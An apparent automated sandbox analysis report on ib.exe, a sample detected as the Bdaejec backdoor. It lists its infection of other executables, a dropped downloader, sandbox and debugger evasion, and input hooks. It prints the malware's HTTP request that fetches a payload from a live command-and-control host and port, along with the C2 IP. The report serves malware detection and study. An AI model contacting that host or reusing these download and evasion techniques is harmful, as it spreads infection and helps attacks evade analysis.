Windows Analysis Report
ib.exe

Overview

General Information

Sample name: ib.exe
Analysis ID: 1542812
MD5: 1913f1b56f94a777c0130ef6e358586f
SHA1: b1bc6735532a06744d37245f172408f8c2f062b0
SHA256: 79757b669da7754fb0319e313a1c24b9c9e170b7815174ca55959eb3bbca43f3
Tags: Backdoor, BDAEJEC, exe, user-osuchdayu

Detection

Bdaejec
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Bdaejec
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject threads in other processes
Found API chain indicative of sandbox detection
Found stalling execution ending in API Sleep call
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

AV Detection

Source: ib.exe Avira: detected
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe ReversingLabs: Detection: 97%
Source: ib.exe ReversingLabs: Detection: 94%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.6% probability
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Joe Sandbox ML: detected
Source: ib.exe Joe Sandbox ML: detected
Source: ib.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ib.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb55 source: ib.exe
Source: Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb source: ib.exe
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Code function: 2_2_00CB29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 2_2_00CB29E2
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Code function: 2_2_00CB2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 2_2_00CB2B8C
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Networking

Source: Network traffic Suricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.4:59334 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49730 -> 44.221.84.105:799
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 799
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799
Source: Joe Sandbox View IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: global traffic HTTP traffic detected:
  GET /cj//k1.rar HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ddos.dnsnb8.net:799
  Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003E2130 Sleep,WSAStartup,WSAGetLastError,socket,WSAGetLastError,htons,inet_addr,setsockopt,sendto,sendto,WSAGetLastError,recvfrom,WSAGetLastError,sendto,WSAGetLastError,exit, 0_2_003E2130
Source: global traffic DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: hjErac.exe, 00000002.00000003.1687849172.0000000000830000.00000004.00001000.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/
Source: hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/cH
Source: hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888921546.0000000000DBA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarGsf
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarGv
Source: hjErac.exe, 00000002.00000002.1888644976.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarR
Source: hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarg
Source: hjErac.exe, 00000002.00000002.1888921546.0000000000DBA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarq
Source: Amcache.hve.2.dr String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.2.dr String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.2.dr String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr String found in binary or memory: http://www.spaceblue.comMathias
Source: hjErac.exe, 00000002.00000002.1888644976.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: SciTE.exe.2.dr String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr String found in binary or memory: https://www.smartsharesystems.com/Morten
Source: C:\Users\user\Desktop\ib.exe Windows user hook set: 0 mouse low level NULL
Source: SciTE.exe.2.dr Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \ memstr_668a944f-e

System Summary

Source: MyProg.exe.2.dr Static PE information: section name: Y|uR
Source: hjErac.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\ib.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003ECB71 0_2_003ECB71
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Code function: 2_2_00CB6D00 2_2_00CB6D00
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\hjErac.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1428
Source: MyProg.exe.2.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: ib.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: hjErac.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: hjErac.exe.0.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: classification engine Classification label: mal100.spre.troj.evad.winEXE@6/11@1/2
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Code function: 2_2_00CB119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 2_2_00CB119F
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
Source: C:\Users\user\Desktop\ib.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\$InputBridge$
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6996
Source: C:\Users\user\Desktop\ib.exe File created: C:\Users\user\AppData\Local\Temp\hjErac.exe
Source: C:\Users\user\Desktop\ib.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ib.exe ReversingLabs: Detection: 94%
Source: unknown Process created: C:\Users\user\Desktop\ib.exe "C:\Users\user\Desktop\ib.exe"
Source: C:\Users\user\Desktop\ib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ib.exe Process created: C:\Users\user\AppData\Local\Temp\hjErac.exe C:\Users\user\AppData\Local\Temp\hjErac.exe
Source: C:\Users\user\Desktop\ib.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ib.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\ib.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\ib.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ib.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ib.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ib.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ib.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ib.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ib.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ib.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ib.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ib.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb55 source: ib.exe
Source: Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb source: ib.exe
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr
Source: ib.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ib.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ib.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ib.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ib.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Unpacked PE file: 2.2.hjErac.exe.cb0000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: initial sample Static PE information: section where entry point is pointing to: Hu
Source: ib.exe Static PE information: section name: Hu
Source: hjErac.exe.0.dr Static PE information: section name: .aspack
Source: hjErac.exe.0.dr Static PE information: section name: .adata
Source: Uninstall.exe.2.dr Static PE information: section name: EpNuZ
Source: MyProg.exe.2.dr Static PE information: section name: PELIB
Source: MyProg.exe.2.dr Static PE information: section name: Y|uR
Source: SciTE.exe.2.dr Static PE information: section name: u
Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003EBE7B push ebp; ret 0_2_003EBE7E
Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003EBE85 push 00000000h; ret 0_2_003EC296
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Code function: 2_2_00CB1638 push dword ptr [00CB3084h]; ret 2_2_00CB170E
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Code function: 2_2_00CB600A push ebp; ret 2_2_00CB600D
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Code function: 2_2_00CB2D9B push ecx; ret 2_2_00CB2DAB
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Code function: 2_2_00CB6014 push 00CB14E1h; ret 2_2_00CB6425
Source: ib.exe Static PE information: section name: Hu entropy: 6.93404046385773
Source: hjErac.exe.0.dr Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.2.dr Static PE information: section name: EpNuZ entropy: 6.934379842605089
Source: MyProg.exe.2.dr Static PE information: section name: Y|uR entropy: 6.93494119851436
Source: SciTE.exe.2.dr Static PE information: section name: u entropy: 6.933703573716871

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\Desktop\ib.exe File created: C:\Users\user\AppData\Local\Temp\hjErac.exe
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File created: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 799
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\ib.exe Code function: GetForegroundWindow,GetWindowThreadProcessId,CreateThread,CloseHandle,Sleep,?_Xlength_error@std@@YAXPBD@Z,OpenProcess,K32GetProcessImageFileNameA,strstr,K32EnumProcessModulesEx,K32GetModuleFileNameExA,StrStrIA,Sleep,?_Xbad_function_call@std@@YAXXZ, 0_2_003E2510
Source: C:\Users\user\Desktop\ib.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\Desktop\ib.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\ib.exe Window / User API: threadDelayed 1945
Source: C:\Users\user\Desktop\ib.exe Window / User API: threadDelayed 3716
Source: C:\Users\user\Desktop\ib.exe Window / User API: foregroundWindowGot 1758
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\ib.exe TID: 6196 Thread sleep time: -3716000s >= -30000s
Source: C:\Users\user\Desktop\ib.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ib.exe Thread sleep count: Count: 1945 delay: -3
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Code function: 2_2_00CB1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00CB1754h 2_2_00CB1718
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Code function: 2_2_00CB29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 2_2_00CB29E2
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe Code function: 2_2_00CB2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 2_2_00CB2B8C
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: Amcache.hve.2.dr Binary or memory string: VMware
Source: Amcache.hve.2.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.2.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888644976.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.2.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ib.exe, 00000000.00000002.4134137721.00000000009FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.2.dr Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.2.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.2.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003E31A6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_003E31A6
Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003E9044 mov eax, dword ptr fs:[00000030h] 0_2_003E9044
Source: C:\Users\user\Desktop\ib.exe Code function: 0_2_003E3308 SetUnhandledExceptionFilter, 0_2_003E3308
